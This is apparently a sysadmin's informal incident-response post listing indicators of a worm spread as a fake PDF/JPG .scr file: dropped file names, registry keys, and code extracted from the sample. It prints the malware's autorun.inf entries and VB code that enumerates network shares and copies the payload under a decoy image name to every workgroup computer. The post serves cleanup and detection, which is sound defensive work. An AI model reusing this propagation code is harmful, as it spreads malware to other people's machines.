Here's what we've pulled out so far. Your mileage may vary.
The malicious file linked in the e-mail is shown as a pdf but it's actually a .scr. I don't have the site here but we blocked it first thing.
Files:
Look for n73.image12.03.2009.JPG.scr and kill it. Registry entries show “pdf*.scr” so anything matching that pattern are suspect
In c:\windows:
Csrss.exe <-that’s a big part of this
ff.exe
gc.exe
hst.iq
ie.exe
im.exe
op.exe
pspv.exe
rd.exe
re.exe
re.iq
tryme1.exe
Registry:
Hklm\software\microsoft\windows nt\currentversion\image file execution options\<any key ending in ExE> ß pay attention to the case
Hklm\software\microsoft\search assistant\ACMru\5603 and possibly 5604
Here's some code we pulled out of the .scr
[autorun]
open=open.exe
icon=%windir%\system32\shell32.dll,8
action=Open Drive to view files
shell\open=Open
shell\open\command=open.exe
shell\open\default=1
' List Network Shares
Const HKEY_LOCAL_MACHINE = &H80000002
dim i
i="0"
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colShares = objWMIService.ExecQuery("Select * from Win32_Share")
For each objShare in colShares
strComputer = "."
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & _
strComputer & "\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
strValueName = i
strValue = objShare.Path
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
i = i + 1
Next
on error resume next
Dim domain
Dim computer
Set domain = GetObject("WinNT://Workgroup")
domain.Filter = Array("Computer")
For Each computer In domain
strComp = computer.Name
DoEvents
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\d\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\c\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\New Folder\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\music\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\print\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\E\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\F\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\G\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\H\" & "N73.Image12.03.2009.JPG.scr"
Next
Text4
[autorun]
open=open.exe
icon=%SystemRoot%\system32\SHELL32.dll,4
action=Open folder to view files
shell\open=Open
shell\open\command=open.exe
shell\open\default=1
/back to work, don't ask me for help I'm a little busy lol